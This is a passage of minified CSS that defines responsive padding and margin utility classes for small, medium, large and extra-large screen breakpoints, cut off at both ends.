!important}.pb-sm-8{padding-bottom:32px !important}.pb-sm-9{padding-bottom:36px !important}.pb-sm-10{padding-bottom:40px !important}.pb-sm-11{padding-bottom:44px !important}.pb-sm-12{padding-bottom:48px !important}.pb-sm-auto{padding-bottom:auto !important}.pl-sm-0{padding-left:0px !important}.pl-sm-1{padding-left:4px !important}.pl-sm-2{padding-left:8px !important}.pl-sm-3{padding-left:12px !important}.pl-sm-4{padding-left:16px !important}.pl-sm-5{padding-left:20px !important}.pl-sm-6{padding-left:24px !important}.pl-sm-7{padding-left:28px !important}.pl-sm-8{padding-left:32px !important}.pl-sm-9{padding-left:36px !important}.pl-sm-10{padding-left:40px !important}.pl-sm-11{padding-left:44px !important}.pl-sm-12{padding-left:48px !important}.pl-sm-auto{padding-left:auto !important}.px-sm-0{padding-left:0px !important;padding-right:0px !important}.px-sm-1{padding-left:4px !important;padding-right:4px !important}.px-sm-2{padding-left:8px !important;padding-right:8px !important}.px-sm-3{padding-left:12px !important;padding-right:12px !important}.px-sm-4{padding-left:16px !important;padding-right:16px !important}.px-sm-5{padding-left:20px !important;padding-right:20px !important}.px-sm-6{padding-left:24px !important;padding-right:24px !important}.px-sm-7{padding-left:28px !important;padding-right:28px !important}.px-sm-8{padding-left:32px !important;padding-right:32px !important}.px-sm-9{padding-left:36px !important;padding-right:36px !important}.px-sm-10{padding-left:40px !important;padding-right:40px !important}.px-sm-11{padding-left:44px !important;padding-right:44px !important}.px-sm-12{padding-left:48px !important;padding-right:48px !important}.px-sm-auto{padding-left:auto !important;padding-right:auto !important}.py-sm-0{padding-top:0px !important;padding-bottom:0px !important}.py-sm-1{padding-top:4px !important;padding-bottom:4px !important}.py-sm-2{padding-top:8px !important;padding-bottom:8px !important}.py-sm-3{padding-top:12px !important;padding-bottom:12px !important}.py-sm-4{padding-top:16px !important;padding-bottom:16px !important}.py-sm-5{padding-top:20px !important;padding-bottom:20px !important}.py-sm-6{padding-top:24px !important;padding-bottom:24px !important}.py-sm-7{padding-top:28px !important;padding-bottom:28px !important}.py-sm-8{padding-top:32px !important;padding-bottom:32px !important}.py-sm-9{padding-top:36px !important;padding-bottom:36px !important}.py-sm-10{padding-top:40px !important;padding-bottom:40px !important}.py-sm-11{padding-top:44px !important;padding-bottom:44px !important}.py-sm-12{padding-top:48px !important;padding-bottom:48px !important}.py-sm-auto{padding-top:auto !important;padding-bottom:auto !important}.m-sm-0{margin:0px !important}.m-sm-1{margin:4px !important}.m-sm-2{margin:8px !important}.m-sm-3{margin:12px !important}.m-sm-4{margin:16px !important}.m-sm-5{margin:20px !important}.m-sm-6{margin:24px !important}.m-sm-7{margin:28px !important}.m-sm-8{margin:32px !important}.m-sm-9{margin:36px !important}.m-sm-10{margin:40px !important}.m-sm-11{margin:44px !important}.m-sm-12{margin:48px !important}.m-sm-auto{margin:auto !important}.mt-sm-0{margin-top:0px !important}.mt-sm-1{margin-top:4px !important}.mt-sm-2{margin-top:8px !important}.mt-sm-3{margin-top:12px !important}.mt-sm-4{margin-top:16px !important}.mt-sm-5{margin-top:20px !important}.mt-sm-6{margin-top:24px !important}.mt-sm-7{margin-top:28px !important}.mt-sm-8{margin-top:32px !important}.mt-sm-9{margin-top:36px !important}.mt-sm-10{margin-top:40px !important}.mt-sm-11{margin-top:44px !important}.mt-sm-12{margin-top:48px !important}.mt-sm-auto{margin-top:auto !important}.mr-sm-0{margin-right:0px !important}.mr-sm-1{margin-right:4px !important}.mr-sm-2{margin-right:8px !important}.mr-sm-3{margin-right:12px !important}.mr-sm-4{margin-right:16px !important}.mr-sm-5{margin-right:20px !important}.mr-sm-6{margin-right:24px !important}.mr-sm-7{margin-right:28px !important}.mr-sm-8{margin-right:32px !important}.mr-sm-9{margin-right:36px !important}.mr-sm-10{margin-right:40px !important}.mr-sm-11{margin-right:44px !important}.mr-sm-12{margin-right:48px !important}.mr-sm-auto{margin-right:auto !important}.mb-sm-0{margin-bottom:0px !important}.mb-sm-1{margin-bottom:4px !important}.mb-sm-2{margin-bottom:8px !important}.mb-sm-3{margin-bottom:12px !important}.mb-sm-4{margin-bottom:16px !important}.mb-sm-5{margin-bottom:20px !important}.mb-sm-6{margin-bottom:24px !important}.mb-sm-7{margin-bottom:28px !important}.mb-sm-8{margin-bottom:32px !important}.mb-sm-9{margin-bottom:36px !important}.mb-sm-10{margin-bottom:40px !important}.mb-sm-11{margin-bottom:44px !important}.mb-sm-12{margin-bottom:48px !important}.mb-sm-auto{margin-bottom:auto !important}.ml-sm-0{margin-left:0px !important}.ml-sm-1{margin-left:4px !important}.ml-sm-2{margin-left:8px !important}.ml-sm-3{margin-left:12px !important}.ml-sm-4{margin-left:16px !important}.ml-sm-5{margin-left:20px !important}.ml-sm-6{margin-left:24px !important}.ml-sm-7{margin-left:28px !important}.ml-sm-8{margin-left:32px !important}.ml-sm-9{margin-left:36px !important}.ml-sm-10{margin-left:40px !important}.ml-sm-11{margin-left:44px !important}.ml-sm-12{margin-left:48px !important}.ml-sm-auto{margin-left:auto !important}.mx-sm-0{margin-left:0px !important;margin-right:0px !important}.mx-sm-1{margin-left:4px !important;margin-right:4px !important}.mx-sm-2{margin-left:8px !important;margin-right:8px !important}.mx-sm-3{margin-left:12px !important;margin-right:12px !important}.mx-sm-4{margin-left:16px !important;margin-right:16px !important}.mx-sm-5{margin-left:20px !important;margin-right:20px !important}.mx-sm-6{margin-left:24px !important;margin-right:24px !important}.mx-sm-7{margin-left:28px !important;margin-right:28px !important}.mx-sm-8{margin-left:32px !important;margin-right:32px !important}.mx-sm-9{margin-left:36px !important;margin-right:36px !important}.mx-sm-10{margin-left:40px !important;margin-right:40px !important}.mx-sm-11{margin-left:44px !important;margin-right:44px !important}.mx-sm-12{margin-left:48px !important;margin-right:48px !important}.mx-sm-auto{margin-left:auto !important;margin-right:auto !important}.my-sm-0{margin-top:0px !important;margin-bottom:0px !important}.my-sm-1{margin-top:4px !important;margin-bottom:4px !important}.my-sm-2{margin-top:8px !important;margin-bottom:8px !important}.my-sm-3{margin-top:12px !important;margin-bottom:12px !important}.my-sm-4{margin-top:16px !important;margin-bottom:16px !important}.my-sm-5{margin-top:20px !important;margin-bottom:20px !important}.my-sm-6{margin-top:24px !important;margin-bottom:24px !important}.my-sm-7{margin-top:28px !important;margin-bottom:28px !important}.my-sm-8{margin-top:32px !important;margin-bottom:32px !important}.my-sm-9{margin-top:36px !important;margin-bottom:36px !important}.my-sm-10{margin-top:40px !important;margin-bottom:40px !important}.my-sm-11{margin-top:44px !important;margin-bottom:44px !important}.my-sm-12{margin-top:48px !important;margin-bottom:48px !important}.my-sm-auto{margin-top:auto !important;margin-bottom:auto !important}}@media screen and (min-width: 768px){.p-md-0{padding:0px !important}.p-md-1{padding:4px !important}.p-md-2{padding:8px !important}.p-md-3{padding:12px !important}.p-md-4{padding:16px !important}.p-md-5{padding:20px !important}.p-md-6{padding:24px !important}.p-md-7{padding:28px !important}.p-md-8{padding:32px !important}.p-md-9{padding:36px !important}.p-md-10{padding:40px !important}.p-md-11{padding:44px !important}.p-md-12{padding:48px !important}.p-md-auto{padding:auto !important}.pt-md-0{padding-top:0px !important}.pt-md-1{padding-top:4px !important}.pt-md-2{padding-top:8px !important}.pt-md-3{padding-top:12px !important}.pt-md-4{padding-top:16px !important}.pt-md-5{padding-top:20px !important}.pt-md-6{padding-top:24px !important}.pt-md-7{padding-top:28px !important}.pt-md-8{padding-top:32px !important}.pt-md-9{padding-top:36px !important}.pt-md-10{padding-top:40px !important}.pt-md-11{padding-top:44px !important}.pt-md-12{padding-top:48px !important}.pt-md-auto{padding-top:auto !important}.pr-md-0{padding-right:0px !important}.pr-md-1{padding-right:4px !important}.pr-md-2{padding-right:8px !important}.pr-md-3{padding-right:12px !important}.pr-md-4{padding-right:16px !important}.pr-md-5{padding-right:20px !important}.pr-md-6{padding-right:24px !important}.pr-md-7{padding-right:28px !important}.pr-md-8{padding-right:32px !important}.pr-md-9{padding-right:36px !important}.pr-md-10{padding-right:40px !important}.pr-md-11{padding-right:44px !important}.pr-md-12{padding-right:48px !important}.pr-md-auto{padding-right:auto !important}.pb-md-0{padding-bottom:0px !important}.pb-md-1{padding-bottom:4px !important}.pb-md-2{padding-bottom:8px !important}.pb-md-3{padding-bottom:12px !important}.pb-md-4{padding-bottom:16px !important}.pb-md-5{padding-bottom:20px !important}.pb-md-6{padding-bottom:24px !important}.pb-md-7{padding-bottom:28px !important}.pb-md-8{padding-bottom:32px !important}.pb-md-9{padding-bottom:36px !important}.pb-md-10{padding-bottom:40px !important}.pb-md-11{padding-bottom:44px !important}.pb-md-12{padding-bottom:48px !important}.pb-md-auto{padding-bottom:auto !important}.pl-md-0{padding-left:0px !important}.pl-md-1{padding-left:4px !important}.pl-md-2{padding-left:8px !important}.pl-md-3{padding-left:12px !important}.pl-md-4{padding-left:16px !important}.pl-md-5{padding-left:20px !important}.pl-md-6{padding-left:24px !important}.pl-md-7{padding-left:28px !important}.pl-md-8{padding-left:32px !important}.pl-md-9{padding-left:36px !important}.pl-md-10{padding-left:40px !important}.pl-md-11{padding-left:44px !important}.pl-md-12{padding-left:48px !important}.pl-md-auto{padding-left:auto !important}.px-md-0{padding-left:0px !important;padding-right:0px !important}.px-md-1{padding-left:4px !important;padding-right:4px !important}.px-md-2{padding-left:8px !important;padding-right:8px !important}.px-md-3{padding-left:12px !important;padding-right:12px !important}.px-md-4{padding-left:16px !important;padding-right:16px !important}.px-md-5{padding-left:20px !important;padding-right:20px !important}.px-md-6{padding-left:24px !important;padding-right:24px !important}.px-md-7{padding-left:28px !important;padding-right:28px !important}.px-md-8{padding-left:32px !important;padding-right:32px !important}.px-md-9{padding-left:36px !important;padding-right:36px !important}.px-md-10{padding-left:40px !important;padding-right:40px !important}.px-md-11{padding-left:44px !important;padding-right:44px !important}.px-md-12{padding-left:48px !important;padding-right:48px !important}.px-md-auto{padding-left:auto !important;padding-right:auto !important}.py-md-0{padding-top:0px !important;padding-bottom:0px !important}.py-md-1{padding-top:4px !important;padding-bottom:4px !important}.py-md-2{padding-top:8px !important;padding-bottom:8px !important}.py-md-3{padding-top:12px !important;padding-bottom:12px !important}.py-md-4{padding-top:16px !important;padding-bottom:16px !important}.py-md-5{padding-top:20px !important;padding-bottom:20px !important}.py-md-6{padding-top:24px !important;padding-bottom:24px !important}.py-md-7{padding-top:28px !important;padding-bottom:28px !important}.py-md-8{padding-top:32px !important;padding-bottom:32px !important}.py-md-9{padding-top:36px !important;padding-bottom:36px !important}.py-md-10{padding-top:40px !important;padding-bottom:40px !important}.py-md-11{padding-top:44px !important;padding-bottom:44px !important}.py-md-12{padding-top:48px !important;padding-bottom:48px !important}.py-md-auto{padding-top:auto !important;padding-bottom:auto !important}.m-md-0{margin:0px !important}.m-md-1{margin:4px !important}.m-md-2{margin:8px !important}.m-md-3{margin:12px !important}.m-md-4{margin:16px !important}.m-md-5{margin:20px !important}.m-md-6{margin:24px !important}.m-md-7{margin:28px !important}.m-md-8{margin:32px !important}.m-md-9{margin:36px !important}.m-md-10{margin:40px !important}.m-md-11{margin:44px !important}.m-md-12{margin:48px !important}.m-md-auto{margin:auto !important}.mt-md-0{margin-top:0px !important}.mt-md-1{margin-top:4px !important}.mt-md-2{margin-top:8px !important}.mt-md-3{margin-top:12px !important}.mt-md-4{margin-top:16px !important}.mt-md-5{margin-top:20px !important}.mt-md-6{margin-top:24px !important}.mt-md-7{margin-top:28px !important}.mt-md-8{margin-top:32px !important}.mt-md-9{margin-top:36px !important}.mt-md-10{margin-top:40px !important}.mt-md-11{margin-top:44px !important}.mt-md-12{margin-top:48px !important}.mt-md-auto{margin-top:auto !important}.mr-md-0{margin-right:0px !important}.mr-md-1{margin-right:4px !important}.mr-md-2{margin-right:8px !important}.mr-md-3{margin-right:12px !important}.mr-md-4{margin-right:16px !important}.mr-md-5{margin-right:20px !important}.mr-md-6{margin-right:24px !important}.mr-md-7{margin-right:28px !important}.mr-md-8{margin-right:32px !important}.mr-md-9{margin-right:36px !important}.mr-md-10{margin-right:40px !important}.mr-md-11{margin-right:44px !important}.mr-md-12{margin-right:48px !important}.mr-md-auto{margin-right:auto !important}.mb-md-0{margin-bottom:0px !important}.mb-md-1{margin-bottom:4px !important}.mb-md-2{margin-bottom:8px !important}.mb-md-3{margin-bottom:12px !important}.mb-md-4{margin-bottom:16px !important}.mb-md-5{margin-bottom:20px !important}.mb-md-6{margin-bottom:24px !important}.mb-md-7{margin-bottom:28px !important}.mb-md-8{margin-bottom:32px !important}.mb-md-9{margin-bottom:36px !important}.mb-md-10{margin-bottom:40px !important}.mb-md-11{margin-bottom:44px !important}.mb-md-12{margin-bottom:48px !important}.mb-md-auto{margin-bottom:auto !important}.ml-md-0{margin-left:0px !important}.ml-md-1{margin-left:4px !important}.ml-md-2{margin-left:8px !important}.ml-md-3{margin-left:12px !important}.ml-md-4{margin-left:16px !important}.ml-md-5{margin-left:20px !important}.ml-md-6{margin-left:24px !important}.ml-md-7{margin-left:28px !important}.ml-md-8{margin-left:32px !important}.ml-md-9{margin-left:36px !important}.ml-md-10{margin-left:40px !important}.ml-md-11{margin-left:44px !important}.ml-md-12{margin-left:48px !important}.ml-md-auto{margin-left:auto !important}.mx-md-0{margin-left:0px !important;margin-right:0px !important}.mx-md-1{margin-left:4px !important;margin-right:4px !important}.mx-md-2{margin-left:8px !important;margin-right:8px !important}.mx-md-3{margin-left:12px !important;margin-right:12px !important}.mx-md-4{margin-left:16px !important;margin-right:16px !important}.mx-md-5{margin-left:20px !important;margin-right:20px !important}.mx-md-6{margin-left:24px !important;margin-right:24px !important}.mx-md-7{margin-left:28px !important;margin-right:28px !important}.mx-md-8{margin-left:32px !important;margin-right:32px !important}.mx-md-9{margin-left:36px !important;margin-right:36px !important}.mx-md-10{margin-left:40px !important;margin-right:40px !important}.mx-md-11{margin-left:44px !important;margin-right:44px !important}.mx-md-12{margin-left:48px !important;margin-right:48px !important}.mx-md-auto{margin-left:auto !important;margin-right:auto !important}.my-md-0{margin-top:0px !important;margin-bottom:0px !important}.my-md-1{margin-top:4px !important;margin-bottom:4px !important}.my-md-2{margin-top:8px !important;margin-bottom:8px !important}.my-md-3{margin-top:12px !important;margin-bottom:12px !important}.my-md-4{margin-top:16px !important;margin-bottom:16px !important}.my-md-5{margin-top:20px !important;margin-bottom:20px !important}.my-md-6{margin-top:24px !important;margin-bottom:24px !important}.my-md-7{margin-top:28px !important;margin-bottom:28px !important}.my-md-8{margin-top:32px !important;margin-bottom:32px !important}.my-md-9{margin-top:36px !important;margin-bottom:36px !important}.my-md-10{margin-top:40px !important;margin-bottom:40px !important}.my-md-11{margin-top:44px !important;margin-bottom:44px !important}.my-md-12{margin-top:48px !important;margin-bottom:48px !important}.my-md-auto{margin-top:auto !important;margin-bottom:auto !important}}@media screen and (min-width: 992px){.p-lg-0{padding:0px !important}.p-lg-1{padding:4px !important}.p-lg-2{padding:8px !important}.p-lg-3{padding:12px !important}.p-lg-4{padding:16px !important}.p-lg-5{padding:20px !important}.p-lg-6{padding:24px !important}.p-lg-7{padding:28px !important}.p-lg-8{padding:32px !important}.p-lg-9{padding:36px !important}.p-lg-10{padding:40px !important}.p-lg-11{padding:44px !important}.p-lg-12{padding:48px !important}.p-lg-auto{padding:auto !important}.pt-lg-0{padding-top:0px !important}.pt-lg-1{padding-top:4px !important}.pt-lg-2{padding-top:8px !important}.pt-lg-3{padding-top:12px !important}.pt-lg-4{padding-top:16px !important}.pt-lg-5{padding-top:20px !important}.pt-lg-6{padding-top:24px !important}.pt-lg-7{padding-top:28px !important}.pt-lg-8{padding-top:32px !important}.pt-lg-9{padding-top:36px !important}.pt-lg-10{padding-top:40px !important}.pt-lg-11{padding-top:44px !important}.pt-lg-12{padding-top:48px !important}.pt-lg-auto{padding-top:auto !important}.pr-lg-0{padding-right:0px !important}.pr-lg-1{padding-right:4px !important}.pr-lg-2{padding-right:8px !important}.pr-lg-3{padding-right:12px !important}.pr-lg-4{padding-right:16px !important}.pr-lg-5{padding-right:20px !important}.pr-lg-6{padding-right:24px !important}.pr-lg-7{padding-right:28px !important}.pr-lg-8{padding-right:32px !important}.pr-lg-9{padding-right:36px !important}.pr-lg-10{padding-right:40px !important}.pr-lg-11{padding-right:44px !important}.pr-lg-12{padding-right:48px !important}.pr-lg-auto{padding-right:auto !important}.pb-lg-0{padding-bottom:0px !important}.pb-lg-1{padding-bottom:4px !important}.pb-lg-2{padding-bottom:8px !important}.pb-lg-3{padding-bottom:12px !important}.pb-lg-4{padding-bottom:16px !important}.pb-lg-5{padding-bottom:20px !important}.pb-lg-6{padding-bottom:24px !important}.pb-lg-7{padding-bottom:28px !important}.pb-lg-8{padding-bottom:32px !important}.pb-lg-9{padding-bottom:36px !important}.pb-lg-10{padding-bottom:40px !important}.pb-lg-11{padding-bottom:44px !important}.pb-lg-12{padding-bottom:48px !important}.pb-lg-auto{padding-bottom:auto !important}.pl-lg-0{padding-left:0px !important}.pl-lg-1{padding-left:4px !important}.pl-lg-2{padding-left:8px !important}.pl-lg-3{padding-left:12px !important}.pl-lg-4{padding-left:16px !important}.pl-lg-5{padding-left:20px !important}.pl-lg-6{padding-left:24px !important}.pl-lg-7{padding-left:28px !important}.pl-lg-8{padding-left:32px !important}.pl-lg-9{padding-left:36px !important}.pl-lg-10{padding-left:40px !important}.pl-lg-11{padding-left:44px !important}.pl-lg-12{padding-left:48px !important}.pl-lg-auto{padding-left:auto !important}.px-lg-0{padding-left:0px !important;padding-right:0px !important}.px-lg-1{padding-left:4px !important;padding-right:4px !important}.px-lg-2{padding-left:8px !important;padding-right:8px !important}.px-lg-3{padding-left:12px !important;padding-right:12px !important}.px-lg-4{padding-left:16px !important;padding-right:16px !important}.px-lg-5{padding-left:20px !important;padding-right:20px !important}.px-lg-6{padding-left:24px !important;padding-right:24px !important}.px-lg-7{padding-left:28px !important;padding-right:28px !important}.px-lg-8{padding-left:32px !important;padding-right:32px !important}.px-lg-9{padding-left:36px !important;padding-right:36px !important}.px-lg-10{padding-left:40px !important;padding-right:40px !important}.px-lg-11{padding-left:44px !important;padding-right:44px !important}.px-lg-12{padding-left:48px !important;padding-right:48px !important}.px-lg-auto{padding-left:auto !important;padding-right:auto !important}.py-lg-0{padding-top:0px !important;padding-bottom:0px !important}.py-lg-1{padding-top:4px !important;padding-bottom:4px !important}.py-lg-2{padding-top:8px !important;padding-bottom:8px !important}.py-lg-3{padding-top:12px !important;padding-bottom:12px !important}.py-lg-4{padding-top:16px !important;padding-bottom:16px !important}.py-lg-5{padding-top:20px !important;padding-bottom:20px !important}.py-lg-6{padding-top:24px !important;padding-bottom:24px !important}.py-lg-7{padding-top:28px !important;padding-bottom:28px !important}.py-lg-8{padding-top:32px !important;padding-bottom:32px !important}.py-lg-9{padding-top:36px !important;padding-bottom:36px !important}.py-lg-10{padding-top:40px !important;padding-bottom:40px !important}.py-lg-11{padding-top:44px !important;padding-bottom:44px !important}.py-lg-12{padding-top:48px !important;padding-bottom:48px !important}.py-lg-auto{padding-top:auto !important;padding-bottom:auto !important}.m-lg-0{margin:0px !important}.m-lg-1{margin:4px !important}.m-lg-2{margin:8px !important}.m-lg-3{margin:12px !important}.m-lg-4{margin:16px !important}.m-lg-5{margin:20px !important}.m-lg-6{margin:24px !important}.m-lg-7{margin:28px !important}.m-lg-8{margin:32px !important}.m-lg-9{margin:36px !important}.m-lg-10{margin:40px !important}.m-lg-11{margin:44px !important}.m-lg-12{margin:48px !important}.m-lg-auto{margin:auto !important}.mt-lg-0{margin-top:0px !important}.mt-lg-1{margin-top:4px !important}.mt-lg-2{margin-top:8px !important}.mt-lg-3{margin-top:12px !important}.mt-lg-4{margin-top:16px !important}.mt-lg-5{margin-top:20px !important}.mt-lg-6{margin-top:24px !important}.mt-lg-7{margin-top:28px !important}.mt-lg-8{margin-top:32px !important}.mt-lg-9{margin-top:36px !important}.mt-lg-10{margin-top:40px !important}.mt-lg-11{margin-top:44px !important}.mt-lg-12{margin-top:48px !important}.mt-lg-auto{margin-top:auto !important}.mr-lg-0{margin-right:0px !important}.mr-lg-1{margin-right:4px !important}.mr-lg-2{margin-right:8px !important}.mr-lg-3{margin-right:12px !important}.mr-lg-4{margin-right:16px !important}.mr-lg-5{margin-right:20px !important}.mr-lg-6{margin-right:24px !important}.mr-lg-7{margin-right:28px !important}.mr-lg-8{margin-right:32px !important}.mr-lg-9{margin-right:36px !important}.mr-lg-10{margin-right:40px !important}.mr-lg-11{margin-right:44px !important}.mr-lg-12{margin-right:48px !important}.mr-lg-auto{margin-right:auto !important}.mb-lg-0{margin-bottom:0px !important}.mb-lg-1{margin-bottom:4px !important}.mb-lg-2{margin-bottom:8px !important}.mb-lg-3{margin-bottom:12px !important}.mb-lg-4{margin-bottom:16px !important}.mb-lg-5{margin-bottom:20px !important}.mb-lg-6{margin-bottom:24px !important}.mb-lg-7{margin-bottom:28px !important}.mb-lg-8{margin-bottom:32px !important}.mb-lg-9{margin-bottom:36px !important}.mb-lg-10{margin-bottom:40px !important}.mb-lg-11{margin-bottom:44px !important}.mb-lg-12{margin-bottom:48px !important}.mb-lg-auto{margin-bottom:auto !important}.ml-lg-0{margin-left:0px !important}.ml-lg-1{margin-left:4px !important}.ml-lg-2{margin-left:8px !important}.ml-lg-3{margin-left:12px !important}.ml-lg-4{margin-left:16px !important}.ml-lg-5{margin-left:20px !important}.ml-lg-6{margin-left:24px !important}.ml-lg-7{margin-left:28px !important}.ml-lg-8{margin-left:32px !important}.ml-lg-9{margin-left:36px !important}.ml-lg-10{margin-left:40px !important}.ml-lg-11{margin-left:44px !important}.ml-lg-12{margin-left:48px !important}.ml-lg-auto{margin-left:auto !important}.mx-lg-0{margin-left:0px !important;margin-right:0px !important}.mx-lg-1{margin-left:4px !important;margin-right:4px !important}.mx-lg-2{margin-left:8px !important;margin-right:8px !important}.mx-lg-3{margin-left:12px !important;margin-right:12px !important}.mx-lg-4{margin-left:16px !important;margin-right:16px !important}.mx-lg-5{margin-left:20px !important;margin-right:20px !important}.mx-lg-6{margin-left:24px !important;margin-right:24px !important}.mx-lg-7{margin-left:28px !important;margin-right:28px !important}.mx-lg-8{margin-left:32px !important;margin-right:32px !important}.mx-lg-9{margin-left:36px !important;margin-right:36px !important}.mx-lg-10{margin-left:40px !important;margin-right:40px !important}.mx-lg-11{margin-left:44px !important;margin-right:44px !important}.mx-lg-12{margin-left:48px !important;margin-right:48px !important}.mx-lg-auto{margin-left:auto !important;margin-right:auto !important}.my-lg-0{margin-top:0px !important;margin-bottom:0px !important}.my-lg-1{margin-top:4px !important;margin-bottom:4px !important}.my-lg-2{margin-top:8px !important;margin-bottom:8px !important}.my-lg-3{margin-top:12px !important;margin-bottom:12px !important}.my-lg-4{margin-top:16px !important;margin-bottom:16px !important}.my-lg-5{margin-top:20px !important;margin-bottom:20px !important}.my-lg-6{margin-top:24px !important;margin-bottom:24px !important}.my-lg-7{margin-top:28px !important;margin-bottom:28px !important}.my-lg-8{margin-top:32px !important;margin-bottom:32px !important}.my-lg-9{margin-top:36px !important;margin-bottom:36px !important}.my-lg-10{margin-top:40px !important;margin-bottom:40px !important}.my-lg-11{margin-top:44px !important;margin-bottom:44px !important}.my-lg-12{margin-top:48px !important;margin-bottom:48px !important}.my-lg-auto{margin-top:auto !important;margin-bottom:auto !important}}@media screen and (min-width: 1200px){.p-xl-0{padding:0px !important}.p-xl-1{padding:4px !important}.p-xl-2{padding:8px !important}.p-xl-3{padding:12px !important}.p-xl-4{padding:16px !important}.p-xl-5{padding:20px !important}.p-xl-6{padding:24px !important}.p-xl-7{padding:28px !important}.p-xl-8{padding:32px !important}.p-xl-9{padding:36px !important}.p-xl-10{padding:40px !important}.p-xl-11{padding:44px !important}.p-xl-12{padding:48px !important}.p-xl-auto{padding:auto !important}.pt-xl-0{padding-top:0px !important}.pt-xl-1{padding-top:4px !important}.pt-xl-2{padding-top:8px !important}.pt-xl-3{padding-top:12px !important}.pt-xl-4{padding-top:16px !important}.pt-xl-5{padding-top:20px !important}.pt-xl-6{padding-top:24px !important}.pt-xl-7{padding-top:28px !important}.pt-xl-8{padding-top:32px !important}.pt-xl-9{padding-top:36px !important}.pt-xl-10{padding-top:40px !important}.pt-xl-11{padding-top:44px !important}.pt-xl-12{padding-top:48px !important}.pt-xl-auto{padding-top:auto !important}.pr-xl-0{padding-right:0px !important}.pr-xl-1{padding-right:4px !important}.pr-xl-2{padding-right:8px !important}.pr-xl-3{padding-right:12px !important}.pr-xl-4{padding-right:16px !important}.pr-xl-5{padding-right:20px !important}.pr-xl-6{padding-right:24px !important}.pr-xl-7{padding-right:28px !important}.pr-xl-8{padding-right:32px !important}.pr-xl-9{padding-right:36px !important}.pr-xl-10{padding-right:40px !important}.pr-xl-11{padding-right:44px !important}.pr-xl-12{padding-right:48px !important}.pr-xl-auto{padding-right:auto !important}.pb-xl-0{padding-bottom:0px !important}.pb-xl-1{padding-bottom:4px !important}.pb-xl-2{padding-bottom:8px !important}.pb-xl-3{padding-bottom:12px !important}.pb-xl-4{padding-bottom:16px !important}.pb-xl-5{padding-bottom:20px !important}.pb-xl-6{padding-bottom:24px !important}.pb-xl-7{padding-bottom:28px !important}.pb-xl-8{padding-bottom:32px !important}.pb-xl-9{padding-bottom:36px !important}.pb-xl-10{padding-bottom:40px !important}.pb-xl-11{padding-bottom:44px !important}.pb-xl-12{padding-bottom:48px !important}.pb-xl-auto{padding-bottom:auto !important}.pl-xl-0{padding-left:0px !important}.pl-xl-1{padding-left:4px !important}.pl-xl-2{padding-left:8px !important}.pl-xl-3{padding-left:12px !important}.pl-xl-4{padding-left:16px !important}.pl-xl-5{padding-left:20px !important}.pl-xl-6{padding-left:24px !important}.pl-xl-7{padding-left:28px !important}.pl-xl-8{padding-left:32px !important}.pl-xl-9{padding-left:36px !important}.pl-xl-10{padding-left:40px !important}.pl-xl-11{padding-left:44px !important}.pl-xl-12{padding-left:48px !important}.pl-xl-auto{padding-left:auto !important}.px-xl-0{padding-left:0px !important;padding-right:0px !important}.px-xl-1{padding-left:4px !important;padding-right:4px !important}.px-xl-2{padding-left:8px !important;padding-right:8px !important}.px-xl-3{padding-left:12px !important;padding-right:12px !important}.px-xl-4{padding-left:16px !important;padding-right:16px !important}.px-xl-5{padding-left:20px !important;padding-right:20px !important}.px-xl-6{padding-left:24px !important;padding-right:24px !important}.px-xl-7{padding-left:28px !important;padding-right:28px !important}.px-xl-8{padding-left:32px !important;padding-right:32px !important}.px-xl-9{padding-left:36px !important;padding-right:36px !important}.px-xl-10{padding-left:40px !important;padding-right:40px !important}.px-xl-11{padding-left:44px !important;padding-right:44px !important}.px-xl-12{padding-left:48px !important;padding-right:48px !important}.px-xl-auto{padding-left:auto !important;padding-right:auto !important}.py-xl-0{padding-top:0px !important;padding-bottom:0px !important}.py-xl-1{padding-top:4px !important;padding-bottom:4px !important}.py-xl-2{padding-top:8px !important;padding-bottom:8px !important}.py-xl-3{padding-top:12px !important;padding-bottom:12px !important}.py-xl-4{padding-top:16px !important;padding-bottom:16px !important}.py-xl-5{padding-top:20px !important;padding-bottom:20px !important}.py-xl-6{padding-top:24px !important;padding-bottom:24px !important}.py-xl-7{padding-top:28px !important;padding-bottom:28px !important}.py-xl-8{padding-top:32px !important;padding-bottom:32px !important}.py-xl-9{padding-top:36px !important;padding-bottom:36px !important}.py-xl-10{padding-top:40px !important;padding-bottom:40px !important}.py-xl-11{padding-top:44px !important;padding-bottom:44px !important}.py-xl-12{padding-top:48px !important;padding-bottom:48px !important}.py-xl-auto{padding-top:auto !important;padding-bottom:auto !important}.m-xl-0{margin:0px !important}.m-xl-1{margin:4px !important}.m-xl-2{margin:8px !important}.m-xl-3{margin:12px !important}.m-xl-4{margin:16px !important}.m-xl-5{margin:20px !important}.m-xl-6{margin:24px !important}.m-xl-7{margin:28px !important}.m-xl-8{margin:32px !important}.m-xl-9{margin:36px !important}.m-xl-10{margin:40px !important}.m-xl-11{margin:44px !important}.m-xl-12{margin:48px !important}.m-xl-auto{margin:auto !important}.mt-xl-0{margin-top:0px !important}.mt-xl-1{margin-top:4px !important}.mt-xl-2{margin-top:8px !important}.mt-xl-3{margin-top:12px !important}.mt-xl-4{margin-top:16px !important}.mt-xl-5{margin-top:20px !important}.mt-xl-6{margin-top:24px !important}.mt-xl-7{margin-top:28px !important}.mt-xl-8{margin-top:32px !important}.mt-xl-9{margin-top:36px !important}.mt-xl-10{margin-top:40px !important}.mt-xl-11{margin-top:44px !important}.mt-xl-12{margin-top:48px !important}.mt-xl-auto{margin-top:auto !important}.mr-xl-0{margin-right:0px !important}.mr-xl-1{margin-right:4px !important}.mr-xl-2{margin-right:8px !important}.mr-xl-3{margin-right:12px !important}.mr-xl-4{margin-right:16px !important}.mr-xl-5{margin-right:20px !important}.mr-xl-6{margin-right:24px !important}.mr-xl-7{margin-right:28px !important}.mr-xl-8{margin-right:32px !important}.mr-xl-9{margin-right:36px !important}.mr-xl-10{margin-right:40px !important}.mr-xl-11{margin-right:44px !important}.mr-xl-12{margin-right:48px !important}.mr-xl-auto{margin-right:auto !important}.mb-xl-0{margin-bottom:0px !important}.mb-xl-1{margin-bottom:4px !important}.mb-xl-2{margin-bottom:8px !important}.mb-xl-3{margin-bottom:12px !important}.mb-xl-4{margin-bottom:16px !important}.mb-xl-5{margin-bottom:20px !important}.mb-xl-6{margin-bottom:24px !important}.mb-xl-7{margin-bottom:28px !important}.mb-xl-8{margin-bottom:32px !important}.mb-xl-9{margin-bottom:36px !important}.mb-xl-10{margin-bottom:40px !important}.mb-xl-11{margin-bottom:44px !important}.mb-xl-12{margin-bottom:48px !important}.mb-xl-auto{margin-bottom:auto !important}.ml-xl-0{margin-left:0px 